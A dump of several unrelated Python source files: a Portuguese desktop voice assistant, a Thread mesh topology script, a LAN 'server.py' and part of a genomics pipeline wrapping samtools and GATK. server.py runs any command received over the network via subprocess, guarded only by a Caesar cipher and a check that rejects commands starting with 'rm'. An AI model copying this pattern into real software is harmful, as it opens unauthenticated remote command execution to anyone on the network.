self.engine_fala('Ok')
self.engine_fala('Retornando')
self.engine_fala('Ficar em silencio é chato')
self.engine_fala('Me fale algo para fazer')
self.run()
class tela(threading.Thread, Label):
def __init__(self, nome, master):
threading.Thread.__init__(self)
self.nome = nome
self.master_tela = master
self.texto_resposta = Label(self.master_tela, font=('Arial', 12), fg='Black', bg='white', height=1, width=20)
self.texto_resposta.grid(column=0, row=1, padx=20, pady=20)
self.texto_cpu = Label(self.master_tela, font=('Arial', 12), fg='black', bg='white', height=1, width=5)
self.texto_cpu.grid(column=1, row=2, padx=190, pady=190)
def run(self):
self.atualizar()
self.atualizar_cpu()
def atualizar(self):
dataatual = datetime.now().strftime(f'%d/%m/%Y - %H:%M:%S Hrs')
self.texto_resposta['text'] = dataatual
# threading.Thread(target=self.atualizar).start()
self.master_tela.after(1, self.atualizar)
def atualizar_cpu(self):
porcentagem = str(cpu_percent())
self.texto_cpu['text'] = porcentagem + "%"
# threading.Thread(target=self.atualizar_cpu).start()
self.master_tela.after(1000, self.atualizar_cpu)
@staticmethod
def fechar():
pyautogui.PAUSE = 1.5
try:
locate = pyautogui.locateOnScreen('x.png', grayscale=True)
locationCenter = pyautogui.center(locate)
except TypeError:
locate = pyautogui.locateOnScreen('x2.PNG', grayscale=True)
locationCenter = pyautogui.center(locate)
pyautogui.click(locationCenter)
@staticmethod
def fechamento_total():
if virtual_assistente.is_run:
pass
else:
janela.destroy()
exit(0)
def tela_aviso(texto):
janelac = Toplevel()
janelac.title(f"Aviso")
image_w = PhotoImage(file="warning.png")
imagem_label = Label(janelac, image=image_w)
imagem_label.place(x=0, y=0, relwidth=1, relheight=1)
textoc = Label(janelac, text=f"{texto:-^60}".upper())
textoc.place(x=200, y=50, anchor="center")
janelac.geometry("400x400")
janelac.resizable(0, 0)
janelac.mainloop()
# validando arquivos necessários
dependencias = ["model", "Nome.PNG", "Iron-Man-Jarvis.png", "Python.ico", "x.png", "x2.PNG", "databaseC.txt",
"databaseF.txt", "databaseR.txt", "chromedriver.exe"]
for dependencia in dependencias:
if not exists(dependencia):
tela_aviso("Alguma dependência não foi satisfeita")
exit(-1)
model_dependences = ['disambig_tid.int', 'final.mdl', 'Gr.fst', 'HCLr.fst',
'ivector', 'mfcc.conf', 'phones.txt', 'README', 'word_boundary.int']
for model_dependence in model_dependences:
if not exists(f"model/{model_dependence}"):
tela_aviso("Alguma dependência não foi satisfeita")
exit(-1)
ivectors = ['final.dubm', 'final.ie', 'final.mat', 'global_cmvn.stats', 'online_cmvn.conf', 'splice.conf']
for ivector in ivectors:
if not exists(f"model/ivector/{ivector}"):
tela_aviso("Alguma dependência não foi satisfeita")
exit(-1)
# variável principal
virtual_assistente = ROXXANE()
if not exists(rf"rede_neural.xml"):
virtual_assistente.notificar("rede_neural.xml não encontrado, recriando...")
virtual_assistente.criar_dataset()
virtual_assistente.treinar_rede()
virtual_assistente.notificar("Pronto, por favor me reinicie")
exit(-1)
# criando a tela
janela = Tk()
janela.iconbitmap("Python.ico")
background_image = PhotoImage(file="Nome.PNG")
background_label = Label(janela, image=background_image)
background_label.place(x=0, y=0, relwidth=1, relheight=1)
if exists(rf"rede_neural.xml"):
with open('rede_neural.xml', 'rb') as f:
virtual_assistente.netWork = load(f)
virtual_assistente.construir_vocabulario(virtual_assistente.frases)
janela.title(f"{virtual_assistente.nome_assistente}")
janela_aparecer = tela(virtual_assistente.nome_assistente, janela)
janela.protocol("WM_DELETE_WINDOW", janela_aparecer.fechamento_total)
janela.geometry('500x300')
janela_aparecer.start()
virtual_assistente.start()
janela.resizable(0, 0)
janela.mainloop()
|
topology.py
|
import logging
from threading import Thread
import kibra.database as db
from kitools import kiserial
PRATE = 5
TIMEOUT = 240
def _get_devices(br_serial):
logging.info('Looking for devices...')
ncps = []
brouter = kiserial.find_devices(has_br=True, has_snum=br_serial)[0]
brouter = kiserial.KiSerial(brouter.port, debug=kiserial.KiDebug(1))
devices = kiserial.find_devices()
for dev in devices:
if not dev.snum in br_serial:
ncps.append(kiserial.KiSerial(dev.port, debug=kiserial.KiDebug(1)))
logging.info('%d devices found' % len(ncps))
return brouter, ncps
def _str2bin(s):
return str(s) if s <= 1 else _str2bin(s >> 1) + str(s & 1)
def _get_atimestamp(auth=False):
from time import time
epoch = time()
seconds = _str2bin(int(epoch)).zfill(48)
ticks = _str2bin(int((epoch - int(epoch)) * 32768)).zfill(15)
U = '1' if auth else '0'
iATS = int(seconds + ticks + U, 2)
return '0x' + hex(iATS).rstrip('L').replace('0x', '').zfill(16)
def _get_oobcom(brouter):
try:
if brouter.ksh_cmd('show status')[0] != 'joined':
return None
except:
print('%s is busy' % brouter.port.port)
return None
oobcom = {}
settings = brouter.ksh_cmd('show netconfig')
for line in settings:
if '| Channel' in line:
oobcom['channel'] = line.split(':')[-1].strip()
elif '| PAN ID' in line:
oobcom['panid'] = line.split(':')[-1].strip()
elif '| Extended PAN ID' in line:
oobcom['xpanid'] = ''.join(line.split()[5:9])
elif '| Network Name' in line:
oobcom['netname'] = '"%s"' % line.split(':')[1].strip()
elif '| Mesh-Local ULA' in line:
oobcom['mlprefix'] = line.split(' : ')[-1].split('/')[0]
elif '| Active Timestamp' in line:
oobcom['actstamp'] = line.split(':')[-1].strip()
elif '| Master Key' in line:
oobcom['mkey'] = line.split(':')[-1].strip()
oobcom['commcred'] = '"%s"' % db.get('ncp_commcred')
return oobcom
def _join_network(dev, role, oobcom):
logging.info('Adding %s to the network as %s' % (dev.name, role))
if dev.ksh_cmd('show status', True)[0] != 'none':
dev.ksh_cmd('debug level none', True)
dev.ksh_cmd('clear')
dev.wait_for('status', ['none'], 5)
dev.ksh_cmd('config outband')
# dev.ksh_cmd('config thver 3')
for key, param in oobcom.items():
dev.ksh_cmd('config %s %s' % (key, param))
if role == 'sed':
dev.ksh_cmd('config pollrate %u' % PRATE)
if role == 'leader' or role == 'reed':
dev.ksh_cmd('config sjitter 1')
dev.ksh_cmd('config role %s' % role)
dev.ksh_cmd('ifup')
dev.wait_for('status', ['joined'], 60)
dev.wait_for('role', [role, 'leader'], 120)
def _stop_topology(dev):
logging.info('Removing %s from the network' % dev.name)
dev.ksh_cmd('clear')
dev.wait_for('status', ['none'], 5)
def form_topology():
db.load()
brouter, ncps = _get_devices(db.get('ncp_serial'))
threads = []
oobcom = _get_oobcom(brouter)
if oobcom:
oobcom['timeout'] = TIMEOUT
for device in ncps:
mac = device.ksh_cmd('show eui64', True)[0]
device.set_mac(mac)
# oobcom['actstamp'] = _get_atimestamp()
threads.append(Thread(target=_join_network, args=[device, 'fed', oobcom]))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def clear_topology():
db.load()
_, ncps = _get_devices(db.get('ncp_serial'))
threads = []
for device in ncps:
threads.append(Thread(target=_stop_topology, args=[device]))
|
server.py
|
#!/usr/bin/env python3
import socket
import re
import threading
import time
import select
import subprocess
from _thread import *
print("#################")
print("Welcome to SERVER")
print("#################")
start = time.time()
end = 20
old_packet = ""
start_time = 0
name = "Server"
RSSI = 0
Online_Users = []
def encrypt(text, s):
result = ""
# traverse text
for i in range(len(text)):
char = text[i]
if (char.isupper()):
result += chr((ord(char) + s - 65) % 26 + 65)
elif (char.islower()):
result += chr((ord(char) + s - 97) % 26 + 97)
elif (char == '\n'):
result += chr(1500)
elif (char == '.'):
result += chr(2000)
elif (char == '-'):
result += chr(2001)
elif (char == '/'):
result += chr(2002)
else:
result+= chr(3000)
return result
def decrypt(text, s):
s = 26 - s
result = ""
# traverse text
for i in range(len(text)):
char = text[i]
if (char.isupper()):
result += chr((ord(char) + s - 65) % 26 + 65)
elif (char.islower()):
result += chr((ord(char) + s - 97) % 26 + 97)
elif (char == chr(1500)):
result += "\n"
elif (char == chr(2000)):
result += "."
elif (char == chr(2001)):
result += "-"
elif (char == chr(2002)):
result += "/"
else:
result += " "
return result
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
#### -----------IP & PORT -------------####
PORT = 12345
Local_IP = get_ip()
search_NET = re.search(r'\b(?:[0-9]{1,3}\.){2}[0-9]{1,3}\b', Local_IP)
Local_NET = search_NET.group()
buffer_size = 1024
#### -------------------------------- ####
def send_packet(HOST, packet):
global PORT, Online_Users
packet = packet.encode('utf-8', 'replace')
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(1)
s.connect((HOST, PORT))
s.sendall(packet)
except:
print("User is not online any more or invalid IP address")
for user in Online_Users:
if user[1] == HOST:
Online_Users.remove(user)
def listen_TCP_packets():
global PORT
global Local_IP
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((Local_IP, PORT))
s.listen()
while True:
conn, addr = s.accept()
data = conn.recv(buffer_size)
if not data:
break
string = str(data.decode('utf-8', 'replace'))
receive(string)
conn.close()
def listen_broadcast():
global PORT
global buffer_size
global Local_IP
global old_packet
global start_time, Online_Users
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.bind(('', PORT))
s.setblocking(0)
while True:
result = select.select([s], [], [])
if not result:
break
message = result[0][0].recv(buffer_size)
if not message:
break
string = str(message.decode('utf-8', 'replace'))
end_time = time.time()
elapsed_time = end_time - start_time
elapsed_time = float(format(elapsed_time, 'f'))
string = string[1:][:-1]
username = string.split(",")[0].strip()
IP = string.split(",")[1].strip()
packet_type = string.split(",")[2].strip()
if Local_IP != IP and (old_packet != string or elapsed_time > 5):
# if (old_packet != string or elapsed_time > 5) :
if [username, IP] not in Online_Users:
Online_Users.append([username, IP])
packet = "[" + name + ", " + Local_IP + ", " + "response" + "]"
# packet_type = announce , response back with unicast TCP
start_new_thread(send_packet, (IP, packet))
old_packet = string
start_time = end_time
def receive(string):
global RSSI
global start, end, Online_Users
string = string[1:][:-1]
username = string.split(",")[0].strip()
IP = string.split(",")[1].strip()
packet_type = ""
message = ""
end = time.time()
elapsed_time = end - start
if "message" in string:
rssi = int(string.split(",")[4].strip())
print("Elapsed: ", elapsed_time)
if elapsed_time < 5:
sendmessage(IP, encrypt("You need to wait five seconds before sending another command.", rssi))
else:
packet_type = string.split(",")[2].strip()
message = string.split(",")[3].strip()
# decryption
message = decrypt(message, rssi)
if "rm" == message[:2]:
sendmessage(IP, encrypt("You can not execute remove commands.", rssi))
else:
if RSSI == 0:
RSSI = rssi
print(RSSI, rssi)
diff = abs(rssi - RSSI)
if diff > 10:
pass
else:
print("New command: " + message)
command = message.split(" ")
output = ""
try:
output = subprocess.check_output(command).decode("utf-8")
except Exception as e:
output = str(e)
output = encrypt(output, rssi)
sendmessage(IP, output)
# response packet
else:
packet_type = string.split(",")[2].strip()
if [username, IP] not in Online_Users:
Online_Users.append([username, IP])
def broadcast(sock, packet):
global PORT
sock.sendto(packet, ('<broadcast>', PORT))
def announce():
global PORT
global Local_IP
global name
packet = "[" + name + ", " + Local_IP + ", " + "announce" + "]"
packet = packet.encode('utf-8', 'replace')
while True:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('', 0))
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
count = 0
# Send 3 broadcast packets
while count < 3:
start_new_thread(broadcast, (sock, packet))
# sock.sendto(packet , ( '<broadcast>', PORT))
# sleep 0.25 seconds between packets
count = count + 1
time.sleep(0.25)
sock.close()
time.sleep(10)
def sendmessage(ip, text):
global Local_IP
global name, start
message = text
packet = "[" + name + ", " + Local_IP + ", " + "message" + ", " + message + "]"
start_new_thread(send_packet, (ip, packet))
start = time.time()
def quit_server():
subprocess.call(["pkill", "-f", "server.py"])
announce_thread = threading.Thread(target=announce, args=())
announce_thread.setDaemon(True)
announce_thread.start()
listen_thread = threading.Thread(target=listen_broadcast, args=())
listen_thread.setDaemon(True)
listen_thread.start()
listen_packets_thread = threading.Thread(target=listen_TCP_packets, args=())
listen_packets_thread.setDaemon(True)
listen_packets_thread.start()
while True:
answer = input("Write Q to shut down server : ")
if answer == "Q":
quit_server()
else:
continue
|
bam.py
|
#!/usr/bin/env python
# coding=utf-8
"""Module Description
Copyright (c) 2017 Jianfeng Li <lee_jianfeng@sjtu.edu.cn>
This code is free software; you can redistribute it and/or modify it
under the terms of the MIT License.
@bam: Bam File Class
@status: experimental
@version: 0.1.0
@author: Jianfeng Li
@contact: lee_jianfeng@sjtu.edu.cn
"""
from utils import *
from reffa import ReffaFile
from vcf import VcfFile
from mpileup import MpileupFile
class BamFile(FundementalFile):
"""
Description:
Class Name: BAM File, need be point the file path and samplename(eg. A101A or A101C and A101T) to initial.
Method:
Fundemental Function:
index:Use samtool index *.bam file and generate *.bam.bai
mpileup:Use samtool mpileup *.bam file and generate mpileup file
Preprocesss Function:
contig_reorder:Use picard to reorder the BAM file according the reference file.
add_read_group:Use picard to add Read Groups,RGID,RGLB,RGPL,RGPU,RGSM in BAM file header.
mark_duplicates:Use picard to Mark Duplcates of the BAM file.
realigner_target_creator:Use GATK to run RealignerTargetCreator
indel_realigner:Use GATK to run IndelRealigner
recalibration:Use GATK to run BaseRecalibrator
print_reads:Use GATK to run PrintReads
split_ntrim:Use GATK to split_ntrim and conduct ReassignOneMappingQuality.
Variant Caller:
haplotype_caller:Use GATK haplotype_caller to conduct Variant Discovery Step.
unifiedgenotyper_caller:Use GATK unifiedgenotyper_caller to conduct Variant Discovery Step.
mutect_caller:Use Mutect1 to conduct Variant Discovery Step.
varscan_caller:Use Varscan2 to conduct Variant Discovery Step.
torrent_caller:Use TVC to conduct Variant Discovery Step.
lofreq_caller:Use LoFreq to conduct Variant Discovery Step.
pindel_caller:Use Pindel to conduct Variant Discovery Step.
"""
def __init__(self, path, samplename, config_dict = "", runid = None):
if runid is None:
runid = samplename
FundementalFile.__init__(self, path, config_dict, runid)
self.samplename = samplename
################################################# Fundemental Function ################################################
def index(self):
"""
Ret:Use samtool index *.bam file and generate *.bam.bai
"""
config_dict = self.config_dict
samtools = config_dict["samtools"]
thread = config_dict["bamfile_index_thread"]
extra_option = config_dict["bamfile_index_extra"]
cmd = "%s index -@ %s %s %s" % (samtools, thread, extra_option, self.path)
if not isexist(self.path + ".bai") and not isexist(self.path[0:-3]+"bai"):
info("Running the samtools index step for " + self.path)
runcmd(cmd)
savecmd(cmd, self.samplename)
else:
savecmd(cmd, self.samplename)
if isexist(self.path[0:-3]+"bai"):
return(self.path[0:-3]+"bai")
elif isexist(self.path + ".bai"):
return(self.path + ".bai")
else:
return(False)
def sort(self, out_bam):
"""
Ret:Use samtool sort *.bam file and generate *.bam.bai
"""
config_dict = self.config_dict
samtools = config_dict["samtools"]
thread = config_dict["bamfile_sort_thread"]
extra_option = config_dict["bamfile_sort_extra"]
info("Running the samtools sort step for " + self.path)
cmd = "%s sort %s -@ %s -o %s %s" % (samtools, extra_option, thread, out_bam, self.path)
if not isexist(out_bam):
runcmd(cmd)
savecmd(cmd, self.samplename)
else:
savecmd(cmd, self.samplename)
if isexist(out_bam):
return(BamFile(out_bam, self.samplename, config_dict))
else:
return(False)
def mpileup(self, out_fn):
"""
Ret:Use samtool mpileup *.bam file and generate *.bam.mpileup
"""
config_dict = self.config_dict
samtools = config_dict["samtools"]
reffa = config_dict["reffa"]
intervals = config_dict["intervals"]
extra_option = config_dict["bamfile_mpileup_extra"]
info("Running the samtools mpileup step for " + self.path)
out_fn = MpileupFile(out_fn, self.samplename, config_dict)
if isexist(intervals):
cmd = "%s mpileup %s -l %s -f %s %s > %s" % (samtools, extra_option, intervals, reffa, self.path, out_fn.path)
else:
cmd = "%s mpileup %s -f %s %s > %s" % (samtools, extra_option, reffa, self.path, out_fn.path)
if out_fn.isexist():
savecmd(cmd, self.samplename)
elif not self.isexist():
info("%s BAM file is not exists!" %(self.path))
return(False)
else:
runcmd(cmd)
savecmd(cmd ,self.samplename)
if not out_fn.isexist():
return(False)
return(out_fn)
def __str__(self):
return(self.path)
################################################# PreProcesss Function #########################################################
def contig_reorder(self, out_bam):
"""
Ret:Use picard to reorder the BAM file according the reference file.(BOTH DNA and RNA)
"""
config_dict = self.config_dict
reffa = config_dict["reffa"]
java = config_dict["java"]
picard = config_dict["picard"]
extra_option = config_dict["bamfile_contig_reorder_extra"]
info("Running the contig reorder by picard for %s!" % self.path)
in_bam = BamFile(self.path, self.samplename, config_dict)
out_bam = BamFile(out_bam, self.samplename, config_dict)
cmd = "%s -jar %s ReorderSam I=%s O=%s REFERENCE=%s %s" %(java, picard, in_bam.path, out_bam.path, reffa, extra_option)
log = " &> %s/log/%s.contig_reorder.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if out_bam.isexist():
savecmd(cmd ,self.samplename)
elif not in_bam.isexist():
info("%s BAM file is not exists!" %(in_bam.path))
return(False)
else:
runcmd(cmd)
savecmd(cmd ,self.samplename)
if not out_bam.isexist():
return(False)
out_bam.index()
return(out_bam) # BamFile Class instance
def add_read_group(self, out_bam, RGID = 1, RGLB = "Jhuanglab", RGPL="ILLUMINA", RGPU = "Hiseq", use_config_file = True):
"""
Ret:Use picard to add Read Groups,RGID,RGLB,RGPL,RGPU,RGSM in BAM file header.(Both DNA and RNA)
"""
config_dict = self.config_dict
reffa = config_dict["reffa"]
java = config_dict["java"]
picard = config_dict["picard"]
extra_option = config_dict["bamfile_add_read_group_extra"]
java_max_mem = config_dict["java_max_mem"]
if use_config_file:
RGID = config_dict["bamfile_RGID"]
RGLB = config_dict["bamfile_RGLB"]
RGPL = config_dict["bamfile_RGPL"]
RGPU = config_dict["bamfile_RGPU"]
info("Running add_read_group step for " + self.path)
RGSM = self.samplename
in_bam = BamFile(self.path, self.samplename, config_dict)
out_bam = BamFile(out_bam, self.samplename, config_dict)
cmd = "%s -Xmx%s -jar %s AddOrReplaceReadGroups \
I=%s \
O=%s \
RGID=%s \
RGLB=%s \
RGPL=%s \
RGPU=%s \
RGSM=%s %s" %(java, java_max_mem, picard, self.path, out_bam, RGID, RGLB, RGPL, RGPU, RGSM, extra_option)
log = " &> %s/log/%s.add_read_group.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if out_bam.isexist():
savecmd(cmd, self.samplename)
elif not in_bam.isexist():
info("%s BAM file is not exists!" %(in_bam.path))
return(False)
else:
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_bam.isexist():
return(False)
out_bam.index()
return(out_bam) # BamFile Class instance
def mark_duplicates(self, out_bam, metrics):
"""
Ret:Use picard to Mark Duplcates of the BAM file.
"""
config_dict = self.config_dict
java = config_dict["java"]
picard = config_dict["picard"]
extra_option = config_dict["bamfile_mark_duplicates_extra"]
java_max_mem = config_dict["java_max_mem"]
info("Running mark_duplicates step for " + self.path)
in_bam = BamFile(self.path, self.samplename, config_dict)
out_bam = BamFile(out_bam ,self.samplename, config_dict)
cmd = "%s -Xmx%s -jar %s MarkDuplicates %s I=%s O=%s CREATE_INDEX=true VALIDATION_STRINGENCY=SILENT M=%s" %(java, java_max_mem, picard, extra_option, self.path, out_bam, metrics)
log = " &> %s/log/%s.mark_duplicates.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if out_bam.isexist():
savecmd(cmd, self.samplename)
elif not in_bam.isexist():
info("%s BAM file is not exists!" %(in_bam.path))
return(False)
else:
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_bam.isexist():
return(False)
return(out_bam) # BamFile Class instance
def realigner_target_creator(self, out_interval):
"""
Ret:Use GATK realigner_target_creator to the BAM file(DNA Seq use).
"""
config_dict = self.config_dict
java = config_dict["java"]
gatk = config_dict["gatk"]
reffa = config_dict["reffa"]
java_max_mem = config_dict["java_max_mem"]
thread = config_dict["bamfile_realigner_target_creator_thread"]
extra_option = config_dict["bamfile_realigner_target_creator_extra"]
info("Running realigner_target_creator step for " + self.path)
in_bam = BamFile(self.path, self.samplename, config_dict)
out_interval_obj = FundementalFile(out_interval, config_dict, self.samplename)#output is out_interval
cmd = "%s -Xmx%s -jar %s -T RealignerTargetCreator -R %s --num_threads %s \
-allowPotentiallyMisencodedQuals -I %s \
-o %s %s " %(java, java_max_mem, gatk, reffa, thread, self.path, out_interval, extra_option)
log = " &> %s/log/%s.realigner_target_creator.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if out_interval_obj.isexist():
savecmd(cmd, self.samplename)
elif not in_bam.isexist():
info("%s BAM file is not exists!" %(in_bam.path))
return(False)
else:
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_interval_obj.isexist():
return(False)
return(out_interval) # BamFile Class instance
def indel_realigner(self, intervals, out_bam):
"""
Ret:Use GATK indel_realigner to the BAM file(DNA Seq use).
"""
config_dict = self.config_dict
java = config_dict["java"]
gatk = config_dict["gatk"]
reffa = config_dict["reffa"]
java_max_mem = config_dict["java_max_mem"]
extra_option = config_dict["bamfile_indel_realigner_extra"]
info("Running indel_realigner step for " + self.path)
in_bam = BamFile(self.path, self.samplename, config_dict)
out_bam = BamFile(out_bam ,self.samplename, config_dict)
cmd = "%s -Xmx%s -jar %s -T IndelRealigner -R %s -targetIntervals %s \
-allowPotentiallyMisencodedQuals -I %s \
-o %s %s " %(java, java_max_mem, gatk, reffa, intervals, self.path, out_bam, extra_option)
log = " &> %s/log/%s.indel_realigner.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if out_bam.isexist():
savecmd(cmd, self.samplename)
elif not in_bam.isexist():
info("%s BAM file is not exists!" %(in_bam.path))
return(False)
else:
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_bam.isexist():
return(False)
return(out_bam) # BamFile Class instance
def recalibration(self, out_grp):
"""
Ret:Use GATK recalibration to the BAM file(DNA Seq use).
"""
config_dict = self.config_dict
java = config_dict["java"]
gatk = config_dict["gatk"]
reffa = config_dict["reffa"]
extra_option = config_dict["bamfile_recalibration_extra"]
java_max_mem = config_dict["java_max_mem"]
known_sites_vcf = config_dict["known_sites_vcf"]
known_sites_vcf = known_sites_vcf.split(":")
info("Running recalibration step for " + self.path)
in_bam = BamFile(self.path, self.samplename, config_dict)
out_grp_obj = FundementalFile(out_grp, config_dict, self.samplename)
cmd = "%s -Xmx%s -jar %s -T BaseRecalibrator -R %s \
--unsafe -I %s \
-o %s %s " %(java, java_max_mem, gatk, reffa, self.path, out_grp_obj.path, extra_option)
for j in known_sites_vcf:
cmd = cmd + " -knownSites " + j
log = " &> %s/log/%s.recalibration.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if out_grp_obj.isexist():
savecmd(cmd, self.samplename)
elif not in_bam.isexist():
info("%s BAM file is not exists!" %(in_bam.path))
return(False)
else:
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_grp_obj.isexist():
return(False)
return(out_grp)
def print_reads(self, grp, out_bam):
"""
Ret:Use GATK to print DNAseq bam data.
"""
config_dict = self.config_dict
java = config_dict["java"]
gatk = config_dict["gatk"]
reffa = config_dict["reffa"]
java_max_mem = config_dict["java_max_mem"]
extra_option = config_dict["bamfile_print_reads_extra"]
info("Running print_reads step for " + self.path)
in_bam = BamFile(self.path, self.samplename, config_dict)
out_bam = BamFile(out_bam ,self.samplename, config_dict)
cmd = "%s -Xmx%s -jar %s -T PrintReads -R %s \
-BQSR %s -I %s \
-o %s %s " %(java, java_max_mem, gatk, reffa, grp, self.path, out_bam, extra_option)
log = " &> %s/log/%s.print_reads.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if out_bam.isexist():
savecmd(cmd, self.samplename)
elif not in_bam.isexist():
info("%s BAM file is not exists!" %(in_bam.path))
return(False)
else:
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_bam.isexist():
return(False)
return(out_bam)
#split_ntrim: RNA seq bam use
def split_ntrim(self, out_bam):
"""
Ret:Use GATK to split_ntrim and conduct ReassignOneMappingQuality for RNAseq bam data.
"""
config_dict = self.config_dict
java = config_dict["java"]
gatk = config_dict["gatk"]
reffa = config_dict["reffa"]
extra_option = config_dict["bamfile_split_ntrim_extra"]
java_max_mem = config_dict["java_max_mem"]
info("Running splitNtrim step for " + self.path)
in_bam = BamFile(self.path, self.samplename, config_dict)
out_bam = BamFile(out_bam ,self.samplename, config_dict)
cmd = "%s -Xmx%s -jar %s -T SplitNCigarReads \
-R %s \
-I %s \
-o %s %s " %(java, java_max_mem, gatk, reffa, in_bam, out_bam, extra_option)
log = " &> %s/log/%s.split_ntrim.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if out_bam.isexist():
savecmd(cmd, self.samplename)
elif not in_bam.isexist():
info("%s BAM file is not exists!" %(in_bam.path))
return(False)
else:
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_bam.isexist():
return(False)
return(out_bam) # BamFile Class instance
###################################################### Variant Caller ###############################################
def haplotype_caller(self, out_dir, control_bam = "", seq_type="dna"):
"""
Ret:Use GATK HaplotypeCaller to conduct Variant Discovery Step.
"""
config_dict = self.config_dict
intervals = config_dict["intervals"]
java = config_dict["java"]
gatk = config_dict["gatk"]
reffa = config_dict["reffa"]
dbsnp = config_dict["dbsnp"]
tmp_dir = config_dict["gatk_tmp_dir"]
extra_option_rna = config_dict["bamfile_haplotype_caller_extra_rna"]
extra_option_dna = config_dict["bamfile_haplotype_caller_extra_dna"]
java_max_mem = config_dict["java_max_mem"]
info("Running Haplotype_caller step for " + self.path)
snp_flag = dbsnp != ""
intervals_flag = intervals != ""
create_dir(out_dir)
out_vcf = out_dir + "/" + self.samplename + ".vcf"
out_vcf = VcfFile(out_vcf,self.samplename, config_dict)
if isinstance(control_bam, BamFile):
control_bam = control_bam.path
if control_bam != "" and isexist(control_bam):
if seq_type == "dna":
cmd = "%s -Xmx%s -Djava.io.tmpdir=%s \
-jar %s -R %s \
-T HaplotypeCaller \
%s \
-I %s -I %s -o %s "\
% (java, java_max_mem, tmp_dir, gatk, reffa, extra_option_dna, self.path, control_bam, out_vcf.path)
else:
cmd = "%s -Xmx%s -Djava.io.tmpdir=%s \
-jar %s -R %s \
-T HaplotypeCaller \
%s \
-I %s -I %s -o %s "\
% (java, java_max_mem, tmp_dir, gatk, reffa, extra_option_rna, self.path, control_bam, out_vcf.path)
else:
if seq_type == "dna":
cmd = "%s -Xmx%s -Djava.io.tmpdir=%s \
-jar %s -R %s \
-T HaplotypeCaller \
%s \
-I %s -o %s"\
% (java, java_max_mem, tmp_dir, gatk, reffa, extra_option_dna, self.path, out_vcf.path)
else:
cmd = "%s -Xmx%s -Djava.io.tmpdir=%s \
-jar %s -R %s \
-T HaplotypeCaller \
%s \
-I %s -o %s"\
% (java, java_max_mem, tmp_dir, gatk, reffa, extra_option_rna, self.path, out_vcf.path)
if snp_flag and intervals_flag :
cmd = cmd + " --dbsnp %s --intervals %s" %(dbsnp,intervals)
elif snp_flag and not intervals_flag:
cmd = cmd + " --dbsnp %s" %(dbsnp)
elif not snp_flag and intervals_flag:
cmd = cmd + " --intervals %s" %(intervals)
log = " &> %s/log/%s.case.Haplotypecaller.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if self.isexist():
if not out_vcf.isexist():
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_vcf.isexist():
return(False)
else:
savecmd(cmd , self.samplename)
return(out_vcf) # VcfFile Class instance
else:
info("Bam File not exists, can not conduct haplotype_caller step!")
return(False)
def unifiedgenotyper_caller(self, out_dir, control_bam = ""):
"""
Ret:Use GATK UnifiedGenotyper to conduct Variant Discovery Step.
"""
config_dict = self.config_dict
java = config_dict["java"]
gatk = config_dict["gatk"]
reffa = config_dict["reffa"]
dbsnp = config_dict["dbsnp"]
intervals = config_dict["intervals"]
thread = config_dict["bamfile_unifiedgenotyper_caller_thread"]
extra_option = config_dict["bamfile_unifiedgenotyper_caller_extra"]
tmp_dir = config_dict["gatk_tmp_dir"]
java_max_mem = config_dict["java_max_mem"]
create_dir(out_dir)
def setcmd(bamfile, out_vcf, backrun=False):
cmd = "%s -Xmx%s -Djava.io.tmpdir=%s -jar %s -R %s %s -nt %s \
-T UnifiedGenotyper \
-I %s -o %s "\
% (java, java_max_mem, tmp_dir, gatk, reffa, extra_option, thread, bamfile, out_vcf)
if snp_flag and intervals_flag :
cmd = cmd + " --dbsnp %s --intervals %s" %(dbsnp,intervals)
elif snp_flag and not intervals_flag:
cmd = cmd + " --dbsnp %s" %(dbsnp)
elif not snp_flag and intervals_flag:
cmd = cmd + " --intervals %s" %(intervals)
if backrun:
cmd = cmd + " &"
return(cmd)
snp_flag = dbsnp != ""
intervals_flag = intervals != ""
out_vcf = out_dir + "/" + self.samplename + ".vcf"
out_vcf = VcfFile(out_vcf, self.samplename, config_dict)
if isinstance(control_bam, BamFile):
control_bam = control_bam.path
if control_bam != "" and isexist(control_bam):
info("Running Unifiedgenotyper_caller step for " + self.path + " and " + control_bam)
out_case_vcf = VcfFile(out_vcf.path + ".case", self.samplename, config_dict)
out_control_vcf = VcfFile(out_vcf.path + ".control" ,self.samplename, config_dict)
case_cmd = setcmd(self.path, out_case_vcf.path)
log = " &> %s/log/%s.case.Unifiedgenotyper_caller.log" % (os.getcwd(), self.runid)
case_cmd = case_cmd + log
control_cmd = setcmd(control_bam, out_control_vcf.path)
log = " &> %s/log/%s.control.Unifiedgenotyper_caller.log" % (os.getcwd(), self.runid)
control_cmd = control_cmd + log
if self.isexist() and isexist(control_bam):
if not out_vcf.isexist():
threads = []
if not out_case_vcf.isexist():
def func(cmd = case_cmd):
runcmd(cmd)
t1 = threading.Thread(target = func)
threads.append(t1)
savecmd(case_cmd, self.samplename)
if not out_control_vcf.isexist():
def func(cmd = control_cmd):
runcmd(cmd)
t2 = threading.Thread(target = func)
threads.append(t2)
savecmd(control_cmd, self.samplename)
for t in threads:
